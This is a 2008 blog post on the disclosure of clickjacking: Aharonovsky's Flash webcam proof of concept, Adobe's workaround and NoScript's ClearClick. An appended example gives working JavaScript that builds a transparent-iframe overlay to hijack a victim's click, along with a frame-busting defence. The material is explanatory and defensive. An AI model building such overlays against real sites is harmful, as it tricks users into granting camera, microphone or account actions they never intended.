Thursday, October 09, 2008

"Clickjacking" Details Emerge

I wrote about "clickjacking" earlier. The discoverers (Robert Hansen and Jeremiah Grossman) had promised to remain mum because the flaw affected an Adobe product (which turned out to be Flash). On Tuesday, however, Israeli researcher Guy Aharonovsky posted a proof-of-concept (PoC) of clickjacking against Flash. Since the cat was already out of the bag, Adobe told Hansen and Grossman to go ahead and publish.

Aharonovsky's demonstration used clickjacking tactics to reset Adobe's Flash privacy settings, and turn on the computer's webcam and microphone for remote spying. Serious stuff.

Adobe has already posted an advisory for the issue, with a workaround, while promising a fix before the end of October. The workaround reads:
To prevent this potential issue, customers can change their Flash Player settings as follows:
  1. Access the Global Privacy Settings panel of the Adobe Flash Player Settings Manager at the following URL: http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html
  2. Select the "Always deny" button.
  3. Select "Confirm" in the resulting dialog.
  4. Note that you will no longer be asked to allow or deny camera and / or microphone access after changing this setting. Customers who wish to allow certain sites access to their camera and / or microphone can selectively allow access to certain sites via the Website Privacy Settings panel of the Settings Manager at the following URL: http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager06.html.
Hansen has posted a list of 12 different clickjacking scenarios on his blog. He poked at Aharonovsky somewhat, saying the PoC was a "careless disclosure." He also said:
First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn’t. Some overlays entire pages over a page, some uses iframes to get you to click on one spot. Some require JavaScript, some don’t. Some variants use CSRF to pre-load data in forms, some don’t. Clickjacking does not cover any one of these use cases, but rather all of them. That’s why we had to come up with a new term for it - like the term or not.
Only two of the scenarios have been fixed so far. As I indicated earlier, however, Firefox users can use the NoScript extension as protection, and the latest NoScript releases include a new feature, ClearClick, an anti-clickjacking technology that disables user interaction with partially obstructed or not clearly visible embedded objects.

As I said earlier, it's not an extension I'd ask the general public to use, but for those who are willing to put up with the extra work, it's great protection, until the browser developers come up with a proper fix.
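To make the iframe variant Hansen describes concrete, here is an added example (not code from the original post, from Hansen's scenarios, or from Aharonovsky's PoC). The attacker side builds a page with a transparent iframe holding the target page, offset so the target's real button sits exactly under a decoy button; the defender side is the classic "frame-busting" check a page can run on load. The target URL, button coordinates and page dimensions are made-up values for illustration.

```javascript
// Added example, not the original post's code. All URLs and coordinates are
// hypothetical: a real attacker measures the target page's layout beforehand.

// Attacker side. The iframe is drawn ABOVE the decoy (z-index:2) with
// opacity:0, so the victim sees the decoy but the click lands in the frame,
// on whatever sits at that spot in the target page, with the victim's own
// cookies and session attached.
function frameOffset(decoy, targetButton) {
  // Shift the iframe so targetButton's top-left corner lands exactly where
  // the decoy button is drawn on the attacker's page.
  return { left: decoy.x - targetButton.x, top: decoy.y - targetButton.y };
}

function buildClickjackPage(opts) {
  const { targetUrl, targetButton, decoy, frame } = opts;
  const off = frameOffset(decoy, targetButton);
  return `<!doctype html>
<html><body>
<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;width:${targetButton.w}px;height:${targetButton.h}px;z-index:1">${decoy.label}</button>
<iframe src="${targetUrl}" scrolling="no"
  style="position:absolute;left:${off.left}px;top:${off.top}px;width:${frame.w}px;height:${frame.h}px;opacity:0;z-index:2;border:0"></iframe>
</body></html>`;
}

// Defender side: the classic frame-busting check. If the page finds itself
// inside someone else's frame, it navigates the top window to itself, which
// tears down the attacker's overlay. It takes a window-like object so it can
// be exercised outside a browser; in a real page call framebust(window).
function framebust(win) {
  if (win.top === win.self) return false;   // not framed, nothing to do
  win.top.location = win.self.location;     // break out of the enclosing frame
  return true;
}

// Stand-alone demo with constructed values.
const demoPage = buildClickjackPage({
  targetUrl: "https://target.example/settings",        // hypothetical target
  targetButton: { x: 330, y: 420, w: 90, h: 28 },     // where "Allow" sits
  decoy: { x: 200, y: 150, label: "Claim your prize" },
  frame: { w: 800, h: 600 },
});
console.log(demoPage);
```

The frame-busting script is a stopgap rather than a proper fix: it needs JavaScript enabled in the victim's browser, and an enclosing page can interfere with a frame's attempt to navigate the top window, so it should not be relied on as the only defence. The Adobe workaround above takes the opposite approach for the Flash case: with "Always deny" selected, there is no "Allow" button on the settings dialog for a hidden frame to trick you into clicking.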
